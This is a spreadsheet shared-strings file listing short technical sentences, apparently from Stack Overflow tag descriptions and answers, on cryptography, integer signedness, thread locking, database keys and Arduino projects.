  <si>
    <t>CBC-MAC is a chaining mode to compute a cryptographic signature (specifically, a message authentication code) using a secret key with a block cipher such as AES.</t>
  </si>
  <si>
    <t>These cases include:
Inserting a duplicate key in columns with PRIMARY KEY or UNIQUE
constraints.</t>
  </si>
  <si>
    <t>It provides fast, scalable classification and optional redaction for sensitive data elements like credit card numbers, names, social security numbers, passport numbers, US and selected international drivers license numbers, phone numbers, and more.</t>
  </si>
  <si>
    <t>This size will be in single units of 8 bytes 
(due to shift &gt;&gt; 3)*/
__prog_mem_size = (__end_prog_mem - __start_prog_mem);
Removed the atomic locking mechanism (the code list at the very top) allows the program to run, but output is jumbled due to non-thread safe code.</t>
  </si>
  <si>
    <t>Support of the privacy feature in a Peripheral depends on the presence
  and the value of two characteristics: Peripheral Privacy Flag
  characteristic as defined in Section 12.3 and the Reconnection Address
  characteristic as defined in Sec- tion 12.4.</t>
  </si>
  <si>
    <t>Rewriting a block cipher, hash function or stream cipher is usually a bad idea, rewriting a custom scheme you have already implemented (see last point) in C++ is a different kind of thing.</t>
  </si>
  <si>
    <t>CodePeer is designed to support large systems and to detect a wide range of programming errors such as misuse of pointers, indexing out of arrays, buffer overflows (a prevalent source of security storage leaks), numeric overflows, numeric wraparounds, and improper use of Application Programming Interfaces (APIs).</t>
  </si>
  <si>
    <t>RSA is a common public key algorithm, which can be used for encryption and signature.</t>
  </si>
  <si>
    <t>Unlike its counterpart int64 which is signed, uint64 can only be used to store positive integers, of values between 0 and  264 - 1.</t>
  </si>
  <si>
    <t>The Z-Wave technology minimizes power consumption so that it is suitable for battery-operated devices and is designed to provide, reliable, low-latency transmission of small data packets at data rates up to 100kbit/s, unlike Wi-Fi and other IEEE 802.11-based wireless LAN systems that are designed primarily for high data rates.</t>
  </si>
  <si>
    <t>Using deterministic encryption allows point lookups, equality joins, grouping and indexing on encrypted columns.</t>
  </si>
  <si>
    <t>The precise timing allows for deterministic, safe "multishredding" (threads in ChucK are called "shreds") where no race conditions, aliasing problems or deadlocks arise.</t>
  </si>
  <si>
    <t>Turning the baud rate way up will only sorta solve your problem (if it works at all- serial communications at hyper speeds is quite sensitive to distance and interference such as from fluorescent lights or parallel extension cords, and may not be sufficiently reliable for you); it still won't get real close to sensor speed, and it will be unreadable.</t>
  </si>
  <si>
    <t>Therefore, instead of encrypting a whole message for RSA, one usually generates a session key (a symmetric key, for example an aes key) and encrypts this key with RSA.</t>
  </si>
  <si>
    <t>* WARNING: you are running uWSGI without its master process manager 
your processes number limit is 7336
your memory page size is 4096 bytes
detected max file descriptor number: 65536
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uwsgi socket 0 bound to UNIX address /var/www/demoapp/demoapp_uwsgi.sock fd 3
Python version: 2.7.9 (default, Sep 17 2016, 20:55:23)  [GCC 4.9.2]
Set PythonHome to /var/www/demoapp/venv
 Python threads support is disabled.</t>
  </si>
  <si>
    <t>For example my gateway publishes the lora payload with some metadata as JSON to the mosquitto broker to the topic gateway/{gatewayid}/rx encrypted with AES 128bit key and encoded as base64.How could i send these measures after to the MQTT IOT agent as encrypted attributes as JSON format?</t>
  </si>
  <si>
    <t>A key in a database table can be primary (if it refers to elements in the same table), or foreign (if it refers to the primary key in another table).</t>
  </si>
  <si>
    <t>PKCS #12 is one of a family of standards called Public Key Cryptography Standards (PKCS), originally published by RSA Laboratories.</t>
  </si>
  <si>
    <t>A cyclic redundancy check (CRC) is an error-detecting code commonly used in digital networks and storage devices to detect accidental changes to raw data.</t>
  </si>
  <si>
    <t>The signature tag should not be used to tag questions about digital signatures, email signatures or written signatures.</t>
  </si>
  <si>
    <t>A unique index on a table guarantees that the index key contains no duplicate values and therefore ensures that every row in the table is in some way unique.</t>
  </si>
  <si>
    <t>The best attacks known actually cost more than 2^140 bit operations on average, and degrade quadratically in success probability as the number of bit operations drops.</t>
  </si>
  <si>
    <t>Resources
Subresource Integrity page at MDN
W3C Subresource Integrity specification
Related tags
integrity
data-integrity
authentication
digest</t>
  </si>
  <si>
    <t>Security relates to a wide range of subjects including cryptography, authentication, authorization, privacy, integrity and access-control, among others.</t>
  </si>
  <si>
    <t>It uses Phony gem(E164 numbers are international numbers with a country dial prefix, usually an area code and a subscriber number).</t>
  </si>
  <si>
    <t>Locks are implemented terms of atomic operations, but they can also be used directly to create lock-free algorithms.</t>
  </si>
  <si>
    <t>MCrypt implements numerous cryptographic algorithms, mostly block ciphers and stream ciphers, some of which falls under export restrictions in the United States.</t>
  </si>
  <si>
    <t>XML digital signature is a standard for representing digital signatures as XML.</t>
  </si>
  <si>
    <t>I have a finger print scanner connected to an arduino which transmits data to android device through BT,the FPS has only a built in limited capacity of 200 fingerprints and i need a much higher capacity.Is there a way I can transform the fingerprint templates provided by the FPS directly on an android device to a string , number or byte ?</t>
  </si>
  <si>
    <t>#define WLPF_SHIFT 3  // divide by 8
...
ldr_val += (newval - ldr_val) &gt;&gt; WLPF_SHIFT ;
The use of signed int is problematic since right-shift of a signed type is undefined behaviour.</t>
  </si>
  <si>
    <t>To give a margin of safety, 1-10k is a great choice; for digital signals it seldom matters unless you're into very high-speed applications (beyond the AVRs capability anyways).</t>
  </si>
  <si>
    <t>Even if you bit-bang it via GPIO you would need some hardware mods I believe to handle bus contention detection, and it would be very slow and may not interoperate well with "real" CAN controllers on the bus.</t>
  </si>
  <si>
    <t>However, in certain conditions, it may be a requirement to suppress the automatic behavior of the identity property on the column, and instead provide a user-specified value for the column.</t>
  </si>
  <si>
    <t>On the other side, since the
storage subsystem has no knowledge of database objects and structure, the
encryption strategy cannot be related with user privileges (e.g., using distinct
encryption keys for distinct users), nor to data sensitivity.</t>
  </si>
  <si>
    <t>Now, unsigned char is guaranteed to have 1 byte but not 8 bits.</t>
  </si>
  <si>
    <t>This is because all signed integers are represented using two's complement.</t>
  </si>
  <si>
    <t>Encrypted data is a sequence of pseudo-random bytes.</t>
  </si>
  <si>
    <t>Examples of classical ciphers are the Caesar cipher and the Vigenre cipher.</t>
  </si>
  <si>
    <t>Selective encryption is possible and can be done at various granularities, such as
tables, columns, rows.</t>
  </si>
  <si>
    <t>The IV always is the size of the block size of the cipher.</t>
  </si>
  <si>
    <t>Many important cryptosystems such as RSA and DSA are based on arithmetic operations, such as multiplications, modulo a large number.</t>
  </si>
  <si>
    <t>A positive numeric argument
  unconditionally enables Font Lock mode, and a negative or zero
  argument disables it.</t>
  </si>
  <si>
    <t>In particular, the values set in the encryption parameters ( class) are critical to know, as the behavior of the encryption scheme depends totally on these parameters.</t>
  </si>
  <si>
    <t>Solution
Try to cast the secret variable to const uint8_t* (or const unsigned char*):
Sha256.initHmac((const uint8_t*)"hash key",8);
UPDATE
To solve your new compilation error, just add const in front of all declarations containing PROGMEM in the library sources.</t>
  </si>
  <si>
    <t>0xFF &lt;&lt; 8 results in 0xFF00 which is a signed negative value in 16-bit int2.</t>
  </si>
  <si>
    <t>For questions related with the *mod operation*, that can arise in Cryptography, Number Theory, Hashing, etc..</t>
  </si>
  <si>
    <t>You can initialise an array to be all zeros by doing:
This will result in a array that initially looks like [0,0,0,0,0]
Your second problem is that you are creating an array of 16-bit signed integers.</t>
  </si>
  <si>
    <t>The format of the response will be like:
where:
&lt;ecn&gt;: indicates the security level, from 0 (OPEN) to 4 (Maximum security level)
&lt;ssid&gt;: it's the ssid of the AP
&lt;rssi&gt;: it's the signal strength, which is indicated in decibel format (e.g.</t>
  </si>
  <si>
    <t>The package contains a wide collection of secure hash functions and various encryption algorithms, and it also provides support for random generation.</t>
  </si>
  <si>
    <t>A cyclic redundancy check (CRC) is an error-detecting code designed to detect accidental changes to raw computer data, and is commonly used in digital networks.</t>
  </si>
  <si>
    <t>Useful links
Official signing overview
Signing in debug mode
Signing in release mode
Signing app in Android Studio</t>
  </si>
  <si>
    <t>Generally the terms thrown around when IA is discussed are:
1) Availability
2) Integrity
3) non-repudiation
4) authenticity
5) confidentiality
Availability and Integrity really are the only 2 that are truly IA.</t>
  </si>
  <si>
    <t>All columns, regardless of data type (including POCO references), are
automatically protected by a row wide cryptographic integrity
check.</t>
  </si>
  <si>
    <t>Its main focus is on cards that support cryptographic operations, and facilitate their use in security applications such as authentication, mail encryption and digital signatures.</t>
  </si>
  <si>
    <t>Python also provides a pleasant framework for
  prototyping and experimentation with cryptographic algorithms; thanks
  to its arbitrary-length integers, public key algorithms are easily
  implemented.</t>
  </si>
  <si>
    <t>Advanced Encryption Standard (AES) is a cryptographic block cipher algorithm.</t>
  </si>
  <si>
    <t>Details of how to insert entity to table can be found here:
The Insert Entity operation sends the entity to be inserted as an
  OData entity, which is either a JSON or an Atom feed
it's not completely straight forward ( you have to handle authentication and build OData entity) but it's possible.</t>
  </si>
  <si>
    <t>overflows a 32 bit signed integer for n &gt; 46340.</t>
  </si>
  <si>
    <t>Finally, what is the byte value range I should expect to see for signed 16-bit PCM encoding?</t>
  </si>
  <si>
    <t>The problem is that you are
taking a (signed) int and setting it to 60
taking a (signed) int and setting it to 1000
multiplying them, obtaining a signed int.</t>
  </si>
  <si>
    <t>Keyboards often include a small LED to indicate that Caps lock is active, either on the key itself or in a row with Scroll lock and Num lock indicators.</t>
  </si>
  <si>
    <t>PAdES (PDF Advanced Electronic Signatures) is a standard for enabling digital signature and (eventually) court validity of digitally signed documents in PDF format</t>
  </si>
  <si>
    <t>Node.js encryption is getting decrypted on NodeMCU, even though the encrypted string is a bit different.</t>
  </si>
  <si>
    <t>In order to achieve that, a byte of padding is inserted after val1.</t>
  </si>
  <si>
    <t>byte *validBits,    ///&lt; In/Out: The number of valid bits in the last byte.</t>
  </si>
  <si>
    <t>Since it's a signed literal, it's first sign-extended to a 32-bit signed value.</t>
  </si>
  <si>
    <t>However, decryption without padding can be used to recover the plaintext:
Here the first one is your encryption.</t>
  </si>
  <si>
    <t>Triple DES is a symmetric encryption algorithm that uses the DES cipher three times to encrypt each block of data.</t>
  </si>
  <si>
    <t>Because a DWORD is unsigned, its first bit (Most Significant Bit (MSB)) is not reserved for signing.</t>
  </si>
  <si>
    <t>For example, a letter-shifting cipher might require that "A" be enciphered as "G" - the opposite operation would be needed to decrypt.</t>
  </si>
  <si>
    <t>Negative values are encoded by prefixing the
  number with a minus sign.</t>
  </si>
  <si>
    <t>Data is first encrypted under a symmetric cipher, and then the cipher text is MAC'd under an authentication scheme.</t>
  </si>
  <si>
    <t>Values are in the range of a signed 64-bit number even when using Redis on 32-bit architectures.</t>
  </si>
  <si>
    <t>Detached XML signature is when the xml data to be signed and the signature are two separate documents.</t>
  </si>
  <si>
    <t>This guarantees a low number of collisions in expectation, even if the data is chosen by an adversary.</t>
  </si>
  <si>
    <t>Each column participating in the primary key is implicitly defined as NOT NULL.</t>
  </si>
  <si>
    <t>The NFC Forum defined a mode for symmetrical communication between two devices sporting an NFC frontend, the mode is called peer-to-peer and employed with the Logical Link Control Protocol LLCP.</t>
  </si>
  <si>
    <t>At the moment, the only way I can think of to achieve this is to have a second constant variable
const unsigned int PASSWORD_LENGTH = 5;
However, having the user enter a password and the same password's length in the settings seems like an unnecessary redundancy to me.</t>
  </si>
  <si>
    <t>Otherwise, if there's ever a case where one blocking call is made while the other thread has made its own blocking call in the other direction, deadlock will occur.</t>
  </si>
  <si>
    <t>I have a token stored as an String representation of an hex number:
I also have an unsigned long number as follows:
I need to concatenate tokenStored + noun and have a char array result of a fixed length, but I cant decide how to approach the problem in an elegant way.</t>
  </si>
  <si>
    <t>My pipline for encryption seems to work - but my pipline for decryption fails:
Encryption (runs):
Decryption:
Decode: 
0:00:00.234264235 26462  0x156b380 ERROR           GST_PIPELINE
  grammar.y:726:gst_parse_perform_link: could not link udpsrc0 to
  srtpdec0, srtpdec0 can't handle caps application/x-rtp,
  encoding-name=(string)H264, ssrc=(uint)1356955624,
  srtp-key=(buffer)012345678901234567890123456789012345678901234567890123456789, srtp-cipher=(string)aes-128-icm, srtp-auth=(string)hmac-sha1-80
So I think I need some additional caps - but which?</t>
  </si>
  <si>
    <t>The GiST infrastructure code manages the layout of the index pages on disk, the algorithms for searching indexes and deleting from indexes, and complex transactional details such as page-level locking for high concurrency and write-ahead logging for crash recovery.</t>
  </si>
  <si>
    <t>Examples:
PPP Encapsulation
Consistent Overhead Byte Stuffing (COBS), or maybe COBS/R, which encodes data packets so no zero bytes are present, thus you can use zero bytes for packet delimiting
Packet verification
Various options are:
Checksum
Adler-32
Fletcher
CRC (the more bits the better the check)
Error correction etc
Good questions.</t>
  </si>
  <si>
    <t>This is a bit of an open question as far as I'm aware, as technically they are documented as not being thread safe when used from Python threads, but typically I've found it to be OK.</t>
  </si>
  <si>
    <t>Row locking refers to when a database record is updated and the SQL engine locks the row to ensure referential integrity</t>
  </si>
  <si>
    <t>The IAIK Provider for the Java Cryptography Extension (IAIK-JCE) is a set of APIs and implementations of cryptographic functionality, including hash functions, message authentication codes, symmetric, asymmetric, stream, and block encryption, key and certificate management.</t>
  </si>
  <si>
    <t>The crypt() function takes in a password and an optional salt string (chosen randomly if not supplied), and calculates a cryptographic message digest based on them.</t>
  </si>
  <si>
    <t>The thread safety of the SQLite JDBC connection depends on the SQLite operation mode and can be single thread, multiple thread but only one per connection and serialized (no restrictions).</t>
  </si>
  <si>
    <t>Encryption, by itself, can protect the confidentiality of messages, but other techniques are still needed to protect the integrity and authenticity of a message; for example, verification of a message authentication code (MAC) or a digital signature.</t>
  </si>
  <si>
    <t>While this solves the problem of plaintext that has a length that is not a multiple of 4, it generates a different encrypted value than is generated by the JavaScript implementation.</t>
  </si>
  <si>
    <t>A race condition is when multiple threads/processes/clients all use a resource, without the proper use of locks.</t>
  </si>
  <si>
    <t>The library provides BigUnsigned and BigInteger classes that represent nonnegative integers and signed integers, respectively.</t>
  </si>
  <si>
    <t>The GOST block cipher, defined in the standard GOST 28147-89, is a Soviet and Russian government standard symmetric key block cipher.</t>
  </si>
  <si>
    <t>The thread will be unblocked when another thread notifies that the condition is true, at which point the condition variable reacquires the lock and the caller should test the predicate to check the condition.</t>
  </si>
  <si>
    <t>Instead of signing a message with RSA, one usually generates a cryptographic digest of the message (md5, sha-1, sha-2, ) and signs this digest.</t>
  </si>
  <si>
    <t>Masked memory loads/stores
New permute instructions
Element-wise bit-shifting that allows each element of a vector to be shifted by a different amount.</t>
  </si>
  <si>
    <t>The next two bytes (0x39 and 0x00) are a single 16-bit little-endian signed integer value.</t>
  </si>
  <si>
    <t>The correct datatype for 16 bit signed data is short, not byte.</t>
  </si>
  <si>
    <t>Since ascii values range from 0 to 127, so they are technically signed, and that, I believe, is why I was even able to get negative character values.</t>
  </si>
  <si>
    <t>Secondly, you may move ahead to understand how MAC frame payload is encrypted/decrypted.</t>
  </si>
  <si>
    <t>A cryptarithmetic puzzle is an equation with words whose letters represent decimals digits.</t>
  </si>
  <si>
    <t>However, when i just run the decryption and copy the encrypted value and then run this:
It outputs this in the console:
Decrypted: jR|;1234567890ABCDEF
It has a few original message letters/numbers in there but not sure why its not decrpting it like it does when you run both back-to-back.</t>
  </si>
  <si>
    <t>The standard mainly covers the following topics:
signature representation
definition of signed data
key references
signature generation process</t>
  </si>
  <si>
    <t>For example if you don't take appropriate countermeasures an attacker can reply all the requests they see; a naive block cipher mode make the scheme easily distinguishable.</t>
  </si>
  <si>
    <t>It implements a combination of conventional symmetric-key cryptography for speed, and public-key cryptography for ease of secure key exchange.</t>
  </si>
  <si>
    <t>Some methods of entropy gathering may not yield more than one bit of entropy during some seconds time while others (not really on Cs...) may produce 100 kbit/s or more.</t>
  </si>
  <si>
    <t>These algorithms can be used to compute checksums, message digests, and other signatures.</t>
  </si>
  <si>
    <t>In cryptography, a Feistel cipher is a symmetric structure used in the construction of block ciphers</t>
  </si>
  <si>
    <t>This effectively transforms a block cipher into a stream cipher.</t>
  </si>
  <si>
    <t>It can be used to digitally sign, digest, authenticate or encrypt any form of digital data.</t>
  </si>
  <si>
    <t>Classical ciphers are ciphers that are often used to practice programming and cryptography.</t>
  </si>
  <si>
    <t>It works by counting the number of objects having distinct key values (kind of hashing).</t>
  </si>
  <si>
    <t>Key-value pairs are frequently used in lookup tables, hash tables and configuration files.</t>
  </si>
  <si>
    <t>The digital signature (a hash of the certificate's contents signed by the issuer's private key).</t>
  </si>
  <si>
    <t>BLOCKED
A thread that is blocked waiting for a monitor lock.</t>
  </si>
  <si>
    <t>Some cryptographic operations require padding in order to increase security.</t>
  </si>
  <si>
    <t>Raw / textbook RSA is not a classical cipher even though it should only be used for purposes of practicing cryptography.</t>
  </si>
  <si>
    <t>Common padding scheme include OAEP for encryption and PSS for signing, as well as other algorithms defined by pkcs#1.</t>
  </si>
  <si>
    <t>It behaves like a signed integer whose size is limited only by available memory.</t>
  </si>
  <si>
    <t>File permissions, lack of encryption, and maximum number of users reached (among others) can all be the cause of a 403 response.</t>
  </si>
  <si>
    <t>The 1st 3 represent Read-Write-eXecute permissions for the file owner, the next 3 chars represent only Read and eXecute permissions for the user group and the last 3 chars represent only Read permissions for the "other" users.</t>
  </si>
  <si>
    <t>If you insert "$w=false;" at the start of the long2str and str2long functions, the encrypted value for the PHP implementation becomes the same as the JavaScript implementation, but the decrypted value has garbage at the end.</t>
  </si>
  <si>
    <t>Now, you encrypt the mth letter in the text you want to encrypt using a letter from the word W that was chosen before according to the following formula: 
where: 
m  the serial number of the letter n the text
Em  the letter for the m letter in the text
n  the length of w
L  the letter in w in the specified index.</t>
  </si>
  <si>
    <t>A column master key metadata entry that represents a key, stored in an external key store, which is used to protect (encrypt) column encryption keys when using the Always Encrypted (Database Engine) feature.</t>
  </si>
  <si>
    <t>However, but may also allow unauthorized users to guess information about encrypted values by examining patterns in the encrypted column, especially if there is a small set of possible encrypted values, such as True/False, or North/South/East/West region.</t>
  </si>
  <si>
    <t>A data race occurs when:
two or more threads in a single process access the same memory location concurrently, and
at least one of the accesses is for writing, and
the threads are not using any exclusive locks to control their accesses to that memory.</t>
  </si>
  <si>
    <t>A family of channels that can perform blocking or non-blocking I/O, or non-blocking multiplexed I/O via the Java equivalent of the Unix  function, which avoids the necessity in java.net to create a thread per connection, and hence improves scalability.</t>
  </si>
  <si>
    <t>Cryptography function that takes random bits and a string (typically a password) and uses a one-way hash to provide a new string that can be used for authentication without providing access to the original string.</t>
  </si>
  <si>
    <t>Examples of endianness
A 32-bit signed int value, 12356789 is stored as four bytes in two's complement format.</t>
  </si>
  <si>
    <t>Indeed, I would like to reproduce these classical rules:
Is there something equivalent while using 'secret' ?</t>
  </si>
  <si>
    <t>So if you want to do it portably, you need to convert your 2s-complement value manually into a signed integer.</t>
  </si>
  <si>
    <t>Cutting-edge security logic: high quality, low false positive, differential security checks, capable of spotting a range of subtle flaws, including blind injection vectors.</t>
  </si>
  <si>
    <t>The value is stored in two's complement so I wanted to check since wire.read returns a byte that some people say that is signed and some unsigned if I destroy the values, because I have to do some shifting.</t>
  </si>
  <si>
    <t>On the Arduino the int is a signed 16-bit integer, so reading only one byte of it with a Serial.read() is going to give you unintended results.</t>
  </si>
  <si>
    <t>Only if the locking criterion check indicates that locking is required does the actual locking logic proceed.</t>
  </si>
  <si>
    <t>Normally, you should use char for this purpose (also 8 bits, but it is implementation defined if it is signed or unsigned).</t>
  </si>
  <si>
    <t>It uses cyclic redundancy check (CRC) or message digest algorithms (RFC1321) for integrity, and it uses RC4 for encryption.</t>
  </si>
  <si>
    <t>I want to store position (one byte) of the authorized phone number not the phonenumber (many bytes).</t>
  </si>
  <si>
    <t>In PyCrypto I want to create an RSA key using the hardware random number generator on the raspberry pi.</t>
  </si>
  <si>
    <t>You could give it a shot with exercise precaution while calculating the fuse bits and the lock bits.</t>
  </si>
  <si>
    <t>Each random number is formed by just encrypt the previous one with some fixed key and to go backwards you just decrypt.</t>
  </si>
  <si>
    <t>In Arduino all primitives can be both signed and unsigned just by adding unsigned in front of the definiton</t>
  </si>
  <si>
    <t>javax.crypto.BadPaddingException is raised if, during a decryption operation, the cryptographic padding is found to be corrupt.</t>
  </si>
  <si>
    <t>Electronic signatures are digital representations of a person's "wet" or "live" signature.</t>
  </si>
  <si>
    <t>A 'reentrant lock' is a lock that can be re-acquired by the current owner without blocking or deadlock.</t>
  </si>
  <si>
    <t>Authenticity is similar in concept to non-repudiation except that non-repudiation only guarantees you know the sender.</t>
  </si>
  <si>
    <t>Obvious things to check are that for both encryption and decryption you are using:
the same key, that is byte-for-byte the same.</t>
  </si>
  <si>
    <t>Specified in RFC 1321, MD5 has been employed in a wide variety of security applications, and is also commonly used to check the integrity of files.</t>
  </si>
  <si>
    <t>I am supposed to demonstrate a scenario with and without encrypting RAM memory in Raspberry Pi.</t>
  </si>
  <si>
    <t>However, I am not able to understand the difference between unsigned short and unsigned char in this context.</t>
  </si>
  <si>
    <t>So then you send four bogus bytes, the checksum will be A, which is very likely to be right, and the receiver will assume the transmission has been corrupted.</t>
  </si>
  <si>
    <t>We have secrets, file and volume encryption; and are still developing full-disk encryption.</t>
  </si>
  <si>
    <t>The use of string as the username type means you only allocate as many characters needed to hold the name instead of allocated an assumed max size of sizeOfUsername.</t>
  </si>
  <si>
    <t>Elliptic Curve Integrated Encryption Scheme, or ECIES, is a hybrid encryption system proposed by Victor Shoup in 2001</t>
  </si>
  <si>
    <t>In cryptography, a Feistel cipher is a symmetric structure used in the construction of block ciphers, named after the German-born physicist and cryptographer Horst Feistel who did pioneering research while working for IBM (USA).</t>
  </si>
  <si>
    <t>Elliptic Curve Integrated Encryption Scheme, or ECIES, is a hybrid encryption system proposed by Victor Shoup in 2001.</t>
  </si>
  <si>
    <t>BoneCP's implementation is tuned for high performance by minimizing lock contention to achieve a greater throughput.</t>
  </si>
  <si>
    <t>A sequential, unique identifier for each entry
2nd column: the pin number that the sensor is connected to 
3rd column: the sensor value
4th column: the date and time
Notice that I'm not using a dedicated column for each sensor.</t>
  </si>
  <si>
    <t>I'm trying to covert the string input in the serial to byte of array to write in a block in RFID card
I expect the output will be the string will be byte array.</t>
  </si>
  <si>
    <t>In the absence of reference examples (using either hexadecimal or base64 conversion of the binary encryption result) there is no way to tell whether an implementation of encryption is correct, even if its results decrypt correctly using a corresponding decryption implementation.</t>
  </si>
  <si>
    <t>ON DUPLICATE KEY UPDATE is an SQL feature in MySQL which allows a row to be updated instead on inserted in an INSERT query, if it would otherwise attempt to create a duplicate key in a unique index.</t>
  </si>
  <si>
    <t>Row-level security is database security term which relates to the ability to define and enforce access control logic on rows of data such that a user can only retrieve the rows of data he or she is allowed to view.</t>
  </si>
  <si>
    <t>By using the non-blocking network I/O, Tornado can scale to tens of thousands of open connections, making it ideal for long polling, WebSockets, and other applications that require a long-lived connection to each user.</t>
  </si>
  <si>
    <t>Note that the fail-fast behavior of an iterator cannot be guaranteed as it is, generally speaking, impossible to make any hard guarantees in the presence of unsynchronized concurrent modification.</t>
  </si>
  <si>
    <t>The Holy Standard leaves it up to the implementation to define the result of casting to a signed integer type when the original value can't be represented in that type.</t>
  </si>
  <si>
    <t>Casting the combined unsigned bytes as a signed int before shifting solved that issue and made the output data make much more sense.</t>
  </si>
  <si>
    <t>Twofish is a symmetric key block cipher designed by Bruce Schneier and his team of cryptographers for the 1997 Advanced Encryption Standard contest.</t>
  </si>
  <si>
    <t>PyCryptodome is a self-contained Python package of low-level cryptographic primitives.</t>
  </si>
  <si>
    <t>Certificates, specifically x.509 digital certificates, uses a digital signature to link the use of a public/private key pair with a subject.</t>
  </si>
  <si>
    <t>A race condition is when multiple threads/processes/clients all use a resource, without proper use of locks.</t>
  </si>
  <si>
    <t>Encryption is thus performed within the
application that introduces the data into the system, the data is sent encrypted, thus
naturally stored and retrieved encrypted [1][3][4], to be finally decrypted within the
application.</t>
  </si>
  <si>
    <t>In cryptography, SIV (Synthetic Initialization Vector) is a block cipher mode for authenticated encryption</t>
  </si>
  <si>
    <t>Better way: (but still not foolproof):
Always use HTTPS
Use secret salt (only stored inside Arduino), then hash body of the request with this salt.</t>
  </si>
  <si>
    <t>You don't need to pre-validate this code, there are GUID generators that will create a number for you, guaranteed to be unique for all eternity, so on the PI, you set it up once, to create the PI's code, and use it from then on.</t>
  </si>
  <si>
    <t>The system generates a random salt by default (recommended) and returns a hash that contains the salt, the cost and the hashed password.</t>
  </si>
  <si>
    <t>A cryptographic hash function is a function that takes a string of bytes of variable length and returns a fixed-length digest such that it is extremely difficult to find two inputs that yield the same output or find the original input given an output.</t>
  </si>
  <si>
    <t>A Composite Key is a Key that is made up of multiple columns
Any column(s) that can guarantee uniqueness is called a candidate key; however a composite key is a special type of candidate key that is only formed by a combination of two or more columns.</t>
  </si>
  <si>
    <t>The field of security reserved, the key id mode and the sec level are not in the packet however they should be... That shifts the reading of one byte.</t>
  </si>
  <si>
    <t>If you were to treat the variable as a signed integer, it would correspond to the sign bit.</t>
  </si>
  <si>
    <t>The operating system has a system-wide limit on the number of pages that can be locked at any time.</t>
  </si>
  <si>
    <t>The International Obfuscated C Code Contest is a contest to demonstrate the benefits of clear coding through taking it to the other extreme: maximum obfuscation.</t>
  </si>
  <si>
    <t>ptmalloc2 also reduces lock contention by using per-thread arenas but there is a big problem with ptmalloc2's use of per-thread arenas.</t>
  </si>
  <si>
    <t>Computer storage and transmission systems use a number of measures to provide data integrity, or lack of errors.</t>
  </si>
  <si>
    <t>This will at least force the re-computation of a rainbow table for a specific instance (assuming the salt can be determined by the attacker).</t>
  </si>
  <si>
    <t>The point of using this threaded approach is so that I don't ever "lock up" the UI during a long function call, forcing the user to be blocked on the I/O operations completing before the UI is usable again.</t>
  </si>
  <si>
    <t>A secret key, which can be a number, a word, or just a string of random letters, is applied to the text of a message to change the content in a particular way.</t>
  </si>
  <si>
    <t>Diffie-Hellman, commonly abbreviated DH, refers to a public key cryptographic protocol used by two parties to produce a common shared secret.</t>
  </si>
  <si>
    <t>Memory locking is helpful for real-time applications and/or where security is an issue, as it guarantees the residence out the memory locked and so reduces latency and/or the risk of being placed (swapped ot) to non-secure locations.</t>
  </si>
  <si>
    <t>This system hashes passwords using a version of Bruce Schneier's Blowfish block cipher with modifications designed to raise the cost of off-line password cracking and frustrate fast hardware implementation.</t>
  </si>
  <si>
    <t>jarsigner uses key and certificate information from a keystore to generate digital signatures for JAR files.</t>
  </si>
  <si>
    <t>NodeMCU code:
Node.js working code:
Now again NodeMCU side testing:    
  cipher=encoder.fromBase64("lfJyhboprq4eSM/G6CGwoYmVZaNMY5xL2kR7V2E1Aho=")
  key="0123456789abcdef"
  print(crypto.decrypt("AES-CBC", key, cipher,'0000000000000000'))
  some clear text data
  cipher=encoder.fromBase64("lfJyhboprq4eSM/G6CGwoVoN1sWh5jbhDFSXxGDtBXs=")
  key="0123456789abcdef"
  print(crypto.decrypt("AES-CBC", key, cipher,'0000000000000000'))
  some clear text data
What was working?</t>
  </si>
  <si>
    <t>Note that the hang only occurs in the void encrypt() method and I wonder if it is due to the encode_base64 line where the example code is casting the data as unsigned char*.</t>
  </si>
  <si>
    <t>Having the hash and the salt you can make a software that puts your bruteforce data and salt on a SHA-512 algorithm
to try to find a hash collision or maybe the password.</t>
  </si>
  <si>
    <t>For instance, to read block number 5 (which is located in sector 1), you would authenticate to sector 1.</t>
  </si>
  <si>
    <t>An Identity column is a column in a database table that is made up of values managed by the server and cannot be modified, to be used as a primary key for the table.</t>
  </si>
  <si>
    <t>A code may be thread safe, conditionally safe (mutual exclusion required) or unsafe (can only be safely used by one thread).</t>
  </si>
  <si>
    <t>md5sum is a computer program that calculates and verifies 128-bit MD5 hashes, as described in RFC 1321.</t>
  </si>
  <si>
    <t>A practical example is a lock-free hash table for multi-threaded C++ programs that run on SMP hardware.</t>
  </si>
  <si>
    <t>A closely related system is Discrete Logarithm Integrated Encryption Scheme (DLIES), proposed by Abdalla, Bellare and Rogaway, which operates over integers rather than elliptic curves.</t>
  </si>
  <si>
    <t>Read more here
CEK
Creates a column encryption key with the initial set of values, encrypted with the specified column master keys.</t>
  </si>
  <si>
    <t>A mutex ("mutual exclusion") is a mechanism to ensure integrity when the same data or resource is accessed (in particular, changed) concurrently from several threads.</t>
  </si>
  <si>
    <t>The cascading problem is to overlook the behavior of C++ signed division (which is understandable if you don't know that you should expect signed arithmetic to be an issue in the first place).</t>
  </si>
  <si>
    <t>a situation that occurs when two distinct pieces of data have the same hash value, checksum, fingerprint, or cryptographic digest.</t>
  </si>
  <si>
    <t>The shared secret can be a password, a passphrase, a big number or an array of randomly chosen bytes.</t>
  </si>
  <si>
    <t>Because of this, queries are blocked when a concurrent
  transaction holds a Sch-M (schema modification) lock on the table.</t>
  </si>
  <si>
    <t>SSH Keys are pairs of sequences of randomly generated bytes that provide the basis of SSH public key cryptography and challenge-response authentication.</t>
  </si>
  <si>
    <t>If it found that IMSI inside the database, then it generate a random number and encrypt it with the corresponding Ki (that is stored in the database) and returns that encrypted data to your SIM Card.</t>
  </si>
  <si>
    <t>You need to allocate a buffer large enough to hold your entire concatenated string, e.g:
(The above code is still not safe, you will also need to check the size of test or use )
The way you are doing it will cause an array overflow and possible memory corruption.</t>
  </si>
  <si>
    <t>It can create a virtual encrypted disk within a file or encrypt a partition or (under MS Windows except Windows 2000) the entire storage device (pre-boot authentication).</t>
  </si>
  <si>
    <t>), you should use more appropriate tags such as [public-key-encryption], [digital-signature], [diffie-hellman] or even [cryptography].</t>
  </si>
  <si>
    <t>The maximum a professional programmer can achieve is to pay attention and excercise a due care to allow some latency-masking in a concurrent-mode of code execution, with a carefully issued instructions well beforehand before a forthcoming memory data is indeed consumed, so that the cache-management can release a LRU part and pre-fetch the requested data from slow DRAM.</t>
  </si>
  <si>
    <t>I know that when two wi-fi devices are connected to one another that the connection rate is determined with the highest data rate supported by each product which in this case is 802.11n.</t>
  </si>
  <si>
    <t>Network Model
